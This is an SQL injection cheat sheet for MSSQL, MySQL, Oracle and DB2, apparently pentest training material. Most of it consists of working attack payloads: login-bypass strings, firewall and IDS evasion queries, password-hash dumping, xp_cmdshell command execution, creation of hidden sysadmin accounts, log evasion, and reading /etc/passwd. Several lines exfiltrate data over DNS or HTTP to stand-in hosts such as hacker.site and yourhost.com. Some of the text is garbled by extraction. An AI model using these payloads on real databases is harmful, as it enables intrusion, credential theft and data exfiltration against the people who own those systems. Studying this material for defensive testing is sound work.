

Ethical Hacking and Countermeasures

SQL Injection Cheat Sheet

Databases:

- 1. MSSQL
- 2. MySQL
- 3. ORACLE
- 4. IBM-DB2 SQL
- 5. INGRES SQL
- 6. **INFORMIX**
- 7. POSTGRESQL
- 8. MS ACCESS

1. MSSQL Database

Query	Command
Version	 SELECT @@VERSION; This command obtains the OS/Windows version of the system.
List Users	 SELECT name FROM mastersyslogins; This command lists the names of users from the table mastersyslogins.
Current User	 SELECT user_name(); This command obtains a name of recently logged in user. SELECT system_user; This command obtains the current value of system_user. SELECT user;
Current Osci	 This command obtains the name of impersonated user. SELECT loginname FROM mastersysprocesses WHERE spid = @@SPID; This command obtains the column name loginname from table mastersysprocesses having spid=@@SPID.
List all Database	 SELECT name FROM mastersysdatabases; This command obtains the list of all the databases from database 'mastersysdatabases'. SELECT DB_NAME(N); This command obtains the DB_NAME present at N (Where N=0,1,2,3,).
Current Database	 SELECT DB_NAME(); This command obtains the current database.
List Tables	 SELECT name FROM sysobjects WHERE xtype = 'U'; This command obtains the column 'name' from table sysobjects having xtype value 'U'.
Column Names	 SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames') This command works only for reading current database's tables. SELECT mastersyscolumns.name, TYPE_NAME(mastersyscolumns.xtype) FROM mastersyscolumns, mastersysobjects WHERE mastersyscolumns.id=mastersysobjects.id AND

	mastersysobjects.name='sometable';
	 This command works globally. But you should change the master with the DB name which holds the table you want to read the columns and change 'sometable' with the table name.
Select Nth Row	 SELECT TOP 1 name FROM (SELECT TOP 9 name FROM mastersyslogins ORDER BY name ASC) sq ORDER BY name DESC; This command obtains 9th row.
Select Nth Char	SELECT substring('abcd', 3, 1);—This command returns c.
If Statement	■ IF (1=1) SELECT 1 ELSE SELECT 2; —This command returns 1.
Case Statement	 SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END; —This command returns 1.
Comments	 SELECT 1; This command is used for writing a comment. SELECT /*comment*/1; This command is used to comment out a statement.
String without Quotes	 SELECT CHAR(75)+CHAR(76)+CHAR(77); This command returns 'KLM'.
Time Delay	 WAITFOR DELAY '0:0:5'; This command is used to pause for 5 seconds.
Command Execution	 EXEC xp_cmdshell 'net user'; privOn MSSQL 2005, and you may need to reactivate xp_cmdshell first as it's disabled by default: EXEC sp_configure 'show advanced options', 1; — priv RECONFIGURE; — priv EXEC sp_configure 'xp_cmdshell', 1; — priv RECONFIGURE; — priv
Make DNS Requests	 declare @host varchar(800); select @host = name FROM mastersyslogins; exec('masterxp_getfiledetails "\' + @host + 'c\$boot.ini"'); These commands are used to make DNS request. declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist "\' + @host + 'c\$boot.ini"');

	 These commands are used to make DNS request.
	 NB: Concatenation is not allowed in calls to these SPs, hence you have to use @host.
Bypassing Login Screens	SQL Injection, Login tricks admin'
Bypassing Admin Panel of a Website	Malicious input used to bypass authentication 'or 1=1 1'or'1'='1 admin' "or 0=0 or 0=0 'or 0=0 # or 0=0 # or 0=0 # 'or 'x'='x "or "x"="x 'or ('x'='x 'or 1=1 or 1=1
Bypassing Firewall	Malicious query using normalization method to bypass firewall /?id=1/*union*/union/*select*/select+1,2,3/* Malicious query using HPP technique to bypass firewall /?id=1;select+1&id=2,3+from+users+where+id=1— Malicious query using HPF technique to bypass firewall /?a=1+union/*&b=*/select+1,2 /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users— Malicious query using blind SQL injection to bypass firewall /?id=1+OR+0x50=0x50

	<pre>/?id=1+and+ascii(lower(mid((select+pwd+from+ users+limit+1,1),1,1)))=74</pre>
	Malicious query using signature bypass method to bypass firewall
	/?id=1+union+(select+'xz'from+xxx)
	/?id=(1)union(select(1),mid(hash,1,32)from(users))
	/?id=1+union+(select'1',concat(login,hash)from+users)
	/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
	/?id=xx(1)or(0x50=0x50)
	Malicious query using buffer overflow method to bypass firewall
	?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*! %53eLEct*/%0A/*nnaa*/+1,2,3,4
	Malicious query to enumerate different databases in the server
Database	' and 1 in (select min(name) from master.dbo.sysdatabases where name >'.') –
Enumeration	Malicious query to enumerate different file locations in the databases
	 ' and 1 in (select min(filename) from master.dbo.sysdatabases where filename >'.') –
Tables and	Malicious query to enumerate tables and columns in the database
Columns Enumeration in one Query	'union select 0, sysobjects.name + ': ' + syscolumns.name + ': ' + systypes.name, 1, 1, '1', 1, 1, 1, 1 from sysobjects, syscolumns, systypes where sysobjects.xtype = 'U' AND sysobjects.id = syscolumns.id AND syscolumns.xtype = systypes.xtype
Bypassing Second MD5 Hash Check Login Screens	If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database.
	Username : admin Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
Stacked Query	■ ProductID=1; DROP members
Union Injections	SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members With union you can do SOL quaries cross table. Pasically, you can
	 With union you can do SQL queries cross-table. Basically, you can poison query to return records from another table. This above example will combine results from both news table and members

	table and return all of them. Another Example: 'UNION SELECT 1, 'anotheruser', 'doesnt matter', 1
Log in as Admin User	 DROP sampletable; DROP sampletable;# Username: admin' SELECT * FROM members WHERE username = 'admin'' AND passwor' password' Using this command, you can log in as admin user.
List Passwords	 SELECT name, password FROM mastersysxlogins; This command obtains the columns 'name' and 'password' from the table 'mastersysxlogins'. It works only in MSSQL 2000. SELECT name, password_hash FROM master.sys.sql_logins; This command obtains the columns 'name' and 'password_hash' from the table 'master.sys.sql_logins'. It works only in MSSQL 2005.
List Password Hashes	 SELECT name, password FROM mastersysxlogins This command obtains the columns 'name' and 'password' from the table 'mastersysxlogins'. priv, mssql 2000. SELECT name, master.dbo.fn_varbintohexstr(password) FROM mastersysxlogins This command obtains the columns 'name' and 'master.dbo.fn_varbintohexstr(password)' from the table 'mastersysxlogins'. priv, mssql 2000, Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer. SELECT name, password_hash FROM master.sys.sql_logins

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Password Grabbing	Malicious code to grab the passwords '; begin declare @var varchar(8000) set @var=':' select @var=@var+' '+login+'/'+password+' ' from users where login>@var select @var as var into temp end ' and 1 in (select var from temp) '; drop table temp
Covering Tracks	SQL Server don't log queries which includes sp_password for security reasons(!). So, if you add sp_password to your queries it will not be in SQL Server logs (of course still will be in web server logs, try to use POST if it's possible)
Bulk Insert	Insert a file content to a table. If you don't know internal path of web application, you can read IIS (IIS 6 only) metabase file (%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify application path. Create table foo(line varchar(8000)); bulk insert foo from 'c:\inetpub\wwwroot\login.asp'; Drop temp table; and repeat for another file
Create Users	 EXEC sp_addlogin 'user', 'pass'; This command creates a new SQL Server login where username is 'user' and password is 'pass'.
Drop User	 EXEC sp_droplogin 'user'; This command drops a username = 'user' from SQL Server login.
Make User DBA	 EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; This command makes a 'user' DBA.
Create DB Accounts	Malicious command used to create the database accounts • exec sp_addlogin 'name' , 'password' • exec sp_addsrvrolemember 'name' , 'sysadmin'
Discover DB Structure	 'group by columnnames having 1=1 malicious query used to determine table and column names 'union select sum(columnname) from tablename
Local File Access	 CREATE TABLE mydata (line varchar(8000)); BULK INSERT mydata FROM 'c:boot.ini'; DROP TABLE mydata;

	— This command is used to gain Local File Access.
Hostname, IP Address	 SELECT HOST_NAME(); This command obtains the Hostname and IP address of a system.
Error Based SQLi attack: To throw Conversion Errors	 For integer inputs: convert(int,@@version); For string inputs: '+ convert(int,@@version) +';
Clear SQLi Tests: For Boolean SQL Injection and Silent Attacks	 product.asp?id=4; product.asp?id=5-1; product.asp?id=4 OR 1=1; These commands can be used as tests for Boolean SQL injection and silent attacks.
Error Messages	 SELECT * FROM mastersysmessages; This command retrieves all the errors messages present in the SQL server.
Server Name and Configuration	Malicious Query to retrieve server name and configuration in a network " and 1 in (select @@servername) " and 1 in (select servername from sys.sysservers)
Linked Servers	 SELECT * FROM mastersysservers; This command retrieves all the Linked Servers.
IDS Signature Evasion	Examples for evading 'OR 1=1 signature: OR 'john' = 'john' OR 'microsoft' = 'micro'+'soft' OR 'movies' = N'movies' OR 'software' like 'soft%' OR 7 > 1 OR 'best' > 'b' OR 'whatever' IN ('whatever') OR 5 BETWEEN 1 AND 7
IDS Signature Evasion using Comments	Malicious SQL queries to evade IDS signatures using comments are as follows: '/**/OR/**/1/**/=/**/1 Username:' or 1/*

Time Based SQLi Exploitation	 Password:*/=1 UNI/**/ON SEL/**/ECT (MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER') ?vulnerableParam=1;DECLARE @x as int;DECLARE @w as char(6);SET @x=ASCII(SUBSTRING(({INJECTION}),1,1));IF @x=100 SET @w='0:0:14' ELSE SET @w='0:0:01';WAITFOR DELAY @w-{INJECTION} = You want to run the query. — If the condition is true, will response after 14 seconds. If is false, will be delayed for one second.
Out of Band Channel	 ?vulnerableParam=1; SELECT * FROM OPENROWSET('SQLOLEDB', ({INJECT})+'.yourhost.com';'sa';'pwd', 'SELECT 1'); This command makes DNS resolution request to {INJECT}.yourhost.com. ?vulnerableParam=1; DECLARE @q varchar(1024); SET @q = '\\'+({INJECT})+'.yourhost.com\\test.txt'; EXEC masterxp_dirtree @q
Default Databases	 Northwind Model Sdb pubs — not on sql server 2005 tempdb
Creating Database Accounts	Malicious command used to create database accounts • exec sp_addlogin 'victor', 'Pass123' • exec sp_addsrvrolemember 'victor', 'sysadmin'
Path of DB files	%PROGRAM_FILES%\Microsoft SQL Server\MSSQL.1\MSSQL\Data\
Location of DB Files	 EXEC sp_helpdb master; This command retrieves the location of master.mdf. EXEC sp_helpdb pubs; This command retrieves the location of pubs.mdf.
Privileges	Current privs on a particular object in 2005, 2008 SELECT permission_name FROM masterfn_my_permissions(null, 'DATABASE'); — This command returns a column name 'permission_name' from

the table 'master..fn_my_permissions' where securable is set to 'null' and securable_class permission is set to current 'DATABASE'.

SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER');

— This command returns a column name 'permission_name' from the table 'master..fn_my_permissions' where securable is set to 'null' and securable class permission is set to current 'SERVER'.

SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT');

— This command returns a column name 'permission_name' from the table 'master..fn_my_permissions' where securable is set to 'master..syslogins' and securable_class permission is set to current 'OBJECT'.

SELECT permission_name FROM master..fn_my_permissions('sa', 'USER');

- This command returns a column name 'permission_name' from the table 'master..fn_my_permissions' where securable is set to 'sa' and securable_class permissions are set on a 'USER'.
- current privs in 2005, 2008

SELECT is_srvrolemember('sysadmin');

— This command determines whether a current has 'sysadmin' privilege.

SELECT is_srvrolemember('dbcreator');

— This command determines whether a current has 'dbcreator' privilege.

SELECT is_srvrolemember('bulkadmin');

— This command determines whether a current has 'bulkadmin' privilege.

SELECT is srvrolemember('diskadmin');

— This command determines whether a current has 'diskadmin' privilege.

SELECT is_srvrolemember('processadmin');

— This command determines whether a current has 'processadmin' privilege.

SELECT is_srvrolemember('serveradmin');

— This command determines whether a current has 'serveradmin' privilege.

SELECT is srvrolemember('setupadmin');

— This command determines whether a current has 'setupadmin'

privilege.

SELECT is_srvrolemember('securityadmin');

— This command determines whether a current has 'securityadmin' privilege.

SELECT name FROM master..syslogins WHERE denylogin = 0;

— This command obtains column name 'name' from table master..syslogins having denylogin value as 0.

SELECT name FROM master..syslogins WHERE hasaccess = 1;

— This command obtains column name 'name' from table master..syslogins having hasaccess value as 1.

SELECT name FROM master..syslogins WHERE isntname = 0;

— This command obtains column name 'name' from table master..syslogins having isntname value as 0.

SELECT name FROM master..syslogins WHERE isntgroup = 0;

— This command obtains column name 'name' from table master..syslogins having isntgroup value as 0.

SELECT name FROM master..syslogins WHERE sysadmin = 1;

— This command obtains column name 'name' from table master..syslogins having sysadmin value as 1.

SELECT name FROM master..syslogins WHERE securityadmin = 1;

— This command obtains column name 'name' from table master..syslogins having securityadmin value as 1.

SELECT name FROM master..syslogins WHERE serveradmin = 1;

— This command obtains column name 'name' from table master..syslogins having serveradmin value as 1.

SELECT name FROM master..syslogins WHERE setupadmin = 1;

— This command obtains column name 'name' from table master..syslogins having setupadmin value as 1.

SELECT name FROM master..syslogins WHERE processadmin = 1;

— This command obtains column name 'name' from table master..syslogins having processadmin value as 1.

SELECT name FROM master..syslogins WHERE diskadmin = 1;

 This command obtains column name 'name' from table master..syslogins having diskadmin value as 1.

SELECT name FROM master..syslogins WHERE dbcreator = 1;

- This command obtains column name 'name' from table master..syslogins having dbcreator value as 1.
- SELECT name FROM master..syslogins WHERE bulkadmin = 1;

	 This command obtains column name 'name' from table mastersyslogins having bulkadmin value as 1.
	These are the commands that has several SQL built-in scalar functions that can work in SQL implementations
Identify User Level Privilege	 user or current_user, session_user, system_user ' and 1 in (select user) '; if user = 'dbo' waitfor delay '0:0:5 ' ' union select if(user() like 'root@%', benchmark(50000,sha1('test')), 'false');

2. MySQL Database

Query	Command
Version	 SELECT @@VERSION; This command retrieves the system information of the current installation of SQL Server. SELECT version(); This command selects the specific version of a Server.
OS Interaction	Malicious query used to interact with a target OS 'union select 1,load_file('/etc/passwd'),1,1,1; Malicious commands used to interact with a target OS CREATE FUNCTION sys_exec RETURNS int SONAME 'libudffmwgj.dll'; CREATE FUNCTION sys_eval RETURNS string SONAME 'libudffmwgj.dll';
List Users	 SELECT user FROM mysql.user; This command lists the column 'user' from the table 'mysql.user'.
Current User	 SELECT user(); This command obtains the current MySQL user name and hostname. SELECT system_user(); This command obtains the current value of system_user.
Creating Database Accounts	Malicious query used to create database accounts Example: INSERT INTO mysql.user (user, host, password) VALUES ('victor', 'localhost', PASSWORD('Pass123'))
List all Database	 SELECT schema_name FROM information_schema.schemata; for MySQL >= v5.0 —This command obtains a column name 'schema_name' having a list of databases from the table 'schemata table'. SELECT distinct(db) FROM mysql.db; — priv
Current Database	 SELECT database(); This command obtains the current MySQL database.
Input Validation Circumventi on using Char()	 'or username like char(37); This command is used to inject without quotes (string = "%") 'union select * from users where login = char(114,111,111,116); This command is used to inject with quotes (string="root") 'union select

	1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; — This command is used to load files in unions (string = "/etc/passwd") * and 1=(if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0)); — This command is used to check for existing files (string = "n.ext") * SELECT table_name FROM information_schema.tables WHERE
List Tables	 table_schema = 'tblUsers' This command obtains the column name 'table_name' from the table 'information_schema.tables' having table_schema value 'tblUsers'. tblUsers -> tablename
Column Names	■ SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'tblUsers' — This command obtains the columns name 'table_name' and 'column_name' from the table 'information_schema.tables' having table_schema value 'tblUsers'. tblUsers -> tablename ■ SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; — This command obtains the columns name 'table_name' and 'column_name' from the table 'information_schema.tables' having table_schema value 'username'.
Select Nth Row	 SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; This command returns rows numbered from 0. SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; This command returns rows numbered from 0.
Select Nth Char	 SELECT substr('abcd', 3, 1); This command returns c.
If Statement	■ SELECT if(1=1,'foo','bar'); — returns 'foo'
Case Statement	 SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; This command returns A.
Comments	 SELECT 1; #comment This command is used for writing a comment. SELECT /*comment*/1; This command is used comment out a statement.

String without Quotes	 SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) This command returns 'KLM'.
Time Delay	 SELECT BENCHMARK(1000000,MD5('A')); SELECT SLEEP(5);>= 5.0.12 This command triggers a measurable time delay.
Command Execution	If <i>mysqld</i> (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.
DNS Exfiltration	Malicious query used to extract data like password hashes from DNS request select load_file(concat('\\\',version(),'.hacker.site\\a.txt')); select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c 5c612e747874))
Load File	 'UNION ALL SELECT LOAD_FILE('/etc/passwd') SELECT LOAD_FILE(0x633A5C626F6F742E696E69) This command will show the content of c:\boot.ini.
Log in as Admin User	■ DROP sampletable; ■ DROP sampletable;# Username : admin' : admin' or '1'='1' SELECT * FROM members WHERE \$username = 'admin'' AND \$password = 'password' — This command lists all the users from the column 'members' having \$username value as 'admin' and \$password value as 'password'.
List Passwords	 SELECT user, password FROM mysql.user; This command retrieves the columns 'user' and 'password' from the table 'mysql.user'. SELECT user, password FROM mysql.user LIMIT 1,1; This command retrieves the columns 'user' and 'password' from the table 'mysql.user' with LIMIT 1,1. SELECT password FROM mysql.user WHERE user = 'root'; This command retrieves the column 'password' from the table 'mysql.user' having user value as 'root'.

List Password Hashes	 SELECT host, user, password FROM mysql.user; This command lists columns 'host', 'user' and 'password' from the table 'mysql.user'.
Bulk Insert	 SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; This command is used to insert a file content to a table.
Create Users	 CREATE USER username IDENTIFIED BY 'password'; This command creates a username 'USER' who authenticates by password to log on to the database.
Create DB Accounts	 INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))
Drop User	 DROP USER username; This command drops a username 'USER' from the table.
Make User DBA	 GRANT ALL PRIVILEGES ON *.* TO username@'%'; This command grants DBA privileges to a user.
Local File Access	 ' UNION ALL SELECT LOAD_FILE('/etc/passwd') This command allows you to only read world-readable files. SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; This command allows you to write to file system.
Hostname, IP Address	 SELECT @@hostname; This command obtains the Hostname and IP address of a system.
Error Based SQLi Attack: To throw Conversion Errors	 (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)); This command is used to receive integer inputs. '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'; This command is used to receive string inputs.
Clear SQLi Tests: For Boolean SQL Injection and Silent Attacks	 product.php?id=4 product.php?id=5-1 product.php?id=4 OR 1=1 product.php?id=-1 OR 17-7=10 These commands can be used to test for Boolean SQL injection and silent attacks.

Blind SQL Injection (Time Based)	 SLEEP(25) SELECT BENCHMARK(1000000,MD5('A')); ProductID=1 OR SLEEP(25)=0 LIMIT 1— ProductID=1) OR SLEEP(25)=0 LIMIT 1 ProductID=1' OR SLEEP(25)=0 LIMIT 1— ProductID=1') OR SLEEP(25)=0 LIMIT 1 ProductID=1)) OR SLEEP(25)=0 LIMIT 1— ProductID=5ELECT SLEEP(25)— These commands trigger a measurable time delay.
Time base SQLi Exploitation	 ?vulnerableParam=-99 OR IF((ASCII(MID(({INJECTON}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1— {INJECTION} = You want to run the query. — If the condition is true, will response after 14 seconds. If is false, will be delayed for one second.
Out of Band Channel	 ?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\',({INJECTION}), 'yourhost.com\\'))); This command makes a NBNS query request/DNS resolution request to yourhost.com. ?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\yourhost.com\\share\\output.txt'); This command writes data to your shared folder/file. {INJECTION} = You want to run the query.
Default Databases	information_schema (>= mysql 5.0)mysql
Path of DB Files	■ SELECT @@datadir C:\AppServ\MySQL\data\
Location of DB Files	 SELECT @@datadir; This command obtains the location of DB files.
Privileges	 SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; This command lists list user privileges. SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user;

- list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;
 - This command lists privileges on databases (schemas).
- SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;
 - This command lists privileges on columns.

3. Oracle Database

Query	Command
Version	 SELECT banner FROM v\$version WHERE banner LIKE 'Oracle%'; This command obtains oracle version and build information. SELECT version FROM v\$instance; This command displays the current database information such as host name, status, startup time, etc.
List Users	 SELECT username FROM all_users ORDER BY username; This command obtains column 'username' from the table 'all_users' and sort it by username. SELECT name FROM sys.user\$; This command obtains column 'name' from table 'sys.user\$'.
Current User	 SELECT user FROM dual This command obtains current user from the table 'dual'.
List all Database	 SELECT DISTINCT owner FROM all_tables; — This command lists schemas (one per user). — Also queries TNS listener for other databases. See tnscmd (services status).
Create DB Accounts	This command is used to create database accounts • CREATE USER victor IDENTIFIED BY Pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; GRANT CONNECT TO victor; GRANT RESOURCE TO victor;
Current Database	 SELECT global_name FROM global_name; This command obtains current user from global_name. SELECT name FROM v\$database; This command obtains current username from column 'name', present in the table 'v\$database'. SELECT instance_name FROM v\$instance;

List Tables	 SELECT table_name FROM all_tables; This command obtains column 'table_name' from the table 'all_tables'. SELECT owner, table_name FROM all_tables; This command obtains columns 'owner' and 'table_name' from the table 'all_tables'.
Column Names	 SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; This command obtains column 'column_name' from the table 'all_tab_columns' having value of 'table_name' as 'blah'. SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo' This command obtains column 'column_name' from the table 'all_tab_columns' having value of 'table_name' as 'blah' and value of owner as 'foo'.
Select Nth Row	 SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; This command retrieves 9th row (rows numbered from 1).
Select Nth Char	 SELECT substr('abcd', 3, 1) FROM dual; This command retrieves gets 3rd character, 'c'.
If Statement	 BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; If the condition is true then a time delay is triggered and if the condition is false time delay is not triggered. This command does not work well for SELECT statements.
Case Statement	 SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; If the condition is true, it returns 1. SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; If the condition is true, it returns 2.
Comments	 SELECT 1 FROM dual This command is used for writing a comment. NB: SELECT statements must have a FROM clause in Oracle so you have to use the dummy table name 'dual' when we're not actually selecting from a table.
String without Quotes	 SELECT CHR(75) CHR(76) CHR(77) — This command returns 'KLM'.

Time Delay	 BEGIN DBMS_LOCK.SLEEP(5); END; This command is used to trigger time delay. SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; This command is used, if reverse looks are slow. SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; This command is used, if forward lookups are slow. SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; This command is used, if outbound TCP is filtered / slow.
Command Execution	There are some techniques for command execution. Creating JAVA library DBMS_SCHEDULER EXTPROC PL/SQL native make utility (9i only)
Make DNS Requests	 SELECT UTL_INADDR.get_host_address('google.com') FROM dual; SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; —These commands are used to make DNS request from dual.
Union Injections	 SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members By using union, you can do SQL queries cross-table. Basically, you can poison query to return records from another table and this example will combine results from both news table and members table and return all of them. Another Example: UNION SELECT 1, 'anotheruser', 'doesnt matter', 1
Log in as Admin User	 DROP sampletable; Username: admin'— SELECT * FROM members WHERE username = 'admin'' AND password = 'password' —This command retrieves all the users from the table 'members' where username is 'admin' and password is 'password'.
List Passwords	■ SELECT name, password FROM sys.user\$ where type#=1 —This command retrieves the columns 'name' and 'password' from table 'sys.user\$' having 'type#=1'.

List Password Hashes	 SELECT name, password, astatus FROM sys.user\$ This command retrieves the username and password hashes priv, <= 10g. a status tells you if acct is locked. SELECT name, spare4 FROM sys.user\$ This command retrieves the username and password hashes priv, 11g
Create Users Drop User	 CREATE USER user IDENTIFIED by pass; This command creates a user 'USER' who authenticates by pass to log on to the database. DROP USER This command drops a 'USER'.
Make User DBA	 ■ GRANT DBA to USER — This command grants DBA privilege to 'USER'.
Local File Access	 UTL_FILE can sometimes be used. Check that the following is non-null: SELECT value FROM v\$parameter2 WHERE name = 'utl_file_dir'; Java can be used to read and write files if it's installed (it is not available in Oracle Express).
Hostname, IP Address	 SELECT UTL_INADDR.get_host_name FROM dual; SELECT host_name FROM v\$instance; SELECT UTL_INADDR.get_host_address FROM dual; — This command obtains IP address of the user. SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; — This command obtains the hostnames of the user.
Error Based SQLi Attack: To throw Conversion Errors	 (utl_inaddr.get_host_address((select user from DUAL))); This command is used for accepting integer inputs. '+ (utl_inaddr.get_host_address((select user from DUAL)))+'; This command is used for accepting string inputs.
Clear SQLi Tests: For Boolean SQL Injection and Silent Attacks	 product.asp?id=4 product.asp?id=5-1 product.asp?id=4 OR 1=1 These commands can be used as tests for Boolean SQL injection and silent attacks.

Time Based SQLi Exploitation	 ?vulnerableParam=(SELECT CASE WHEN (NVL(ASCII(SUBSTR(({INJECTION}),1,1)),0) = 100) THEN dbms_pipe.receive_message(('xyz'),14) ELSE dbms_pipe.receive_message(('xyz'),1) END FROM dual); {INJECTION} = You want to run the query. — If the condition is true, will response after 14 seconds. If is false, will be delayed for one second.
Out of Band Channel	 ?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://host/sniff.php?sniff=' ({INJECTION}) '') FROM DUAL);
Default Databases	SYSTEMSYSAUX
Path of DB Files	 SELECT name FROM V\$DATAFILE SELECT * FROM dba_directories
Location of DB Files	 SELECT name FROM V\$DATAFILE; This command retrieves the location of name data file from database 'V\$DATAFILE'.

4. IBM-DB2 SQL Database

Query	Command
	 SELECT service_level FROM table(sysproc.env_get_inst_info()) as instanceinfo
	 This command returns a version of system table.
	 SELECT getvariable('sysibm.version') FROM sysibm.sysdummy1 (v8+)
Varsion	 This command returns an information on built version of system table.
Version	 SELECT prod_release, installed_prod_fullname FROM table(sysproc.env_get_prod_info()) as productinfo
	 This command returns release and full name information of system table.
	SELECT service_level, bld_level FORM sysibmadm.env_inst_info
	 This command returns the service and configuration information of system table.
	DB2 uses OS accounts. Those with DB2 access can be retrieved with:
	 SELECT distinct(authid) FROM sysibmadm.privileges
	 This command retrieves distinct authorization ID of users from sysibmadm.privileges.
	■ SELECT grantee FROM syscat.dbauth
List Users	 This command lists the users with database privileges.
2.50 05015	 SELECT distinct(definer) FROM syscat.schemata
	 This command retrieves distinct authorization ID of the owner of the schema.
	 SELECT distinct(grantee) FROM sysibm.systabauth
	 This command retrieves distinct authorization ID of users having database privileges from sysibm.systabauth.
	SELECT user FROM sysibm.sysdummy1;
	 This command obtains current user from the table sysibm.sysdummy1.
Current User	SELECT session_user FROM sysibm.sysdummy1;
Current Oser	 This command obtains current session user from the table 'sysibm.sysdummy1.
	SELECT system_user FROM sysibm.sysdummy1;
	 This command obtains current system user from the table

	ʻsysibm.sysdummy1.
List all Database	 SELECT schemaname FROM syscat.schemata; —This command obtains a column name 'schemaname' having a list of databases from the table 'syscat.schemata'.
Current Database	 SELECT current server from sysibm.sysdummy1; This command obtains the current database server from sysibm.sysdummy1.
List Tables	 SELECT table_name FROM sysibm.tables; This command obtains the list 'table_name' from table sysibm.tables. SELECT name FROM sysibm.systables; This command obtains the list 'name' from table sysibm.systables.
Column Names	 SELECT name, tbname, coltype FROM sysibm.syscolumns; This command obtains the column names- 'name', 'tbname' and 'coltype' from table sysibm.syscolumns. syscat and sysstat and can also be used in place of sysibm.
Select Nth Row	 SELECT name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc; This command returns first N rows only from sysibm.systables.
Select Nth Char	 SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1; This command returns b.
If Statement	 Seems only allowed in stored procedures. Use case logic instead.
Case Statement	 SELECT CASE WHEN (1=1) THEN 'AAAAAAAAA' ELSE 'BBBBBBBBBB' END FROM sysibm.sysdummy1 — If the condition is true, 'AAAAAAAAA' is returned.
Comments	select blah from foo;This command is used for writing a comment.
String without Quotes	 SELECT chr(65) chr(68) chr(82) chr(73) FROM sysibm.sysdummy1 returns "ADRI". This command returns a string without quotes. It can be used without select.
Time Delay	Heavy queries, for example: 'and (SELECT count(*) FROM sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (SELECT ascii(substr(user,1,1)) FROM

	sysibm.sysdummy1)=68;
	 If user starts with ASCII 68 ('D'), the heavy query will be executed, delaying the response. However, if user doesn't start with ASCII 68, the heavy query won't execute and thus the response will be faster.
Command Execution	 This functionality is allowed from procedures or UDFs.
List Password Hashes	■ N/A (OS User Accounts)
List DBA Accounts	 SELECT distinct(grantee) FROM sysibm.systabauth where CONTROLAUTH='Y'; This command returns a list of DBA accounts from table sysibm.systabauth having CONTROLAUTH value 'Y'.
Local File Access	■ This functionality is available through stored procedures or DB2 tool.
Hostname, IP Address	 SELECT os_name,os_version,os_release,host_name FROM sysibmadm.env_sys_info; This command obtains the Hostname, and IP address of a system from sysibmadm.env_sys_info.
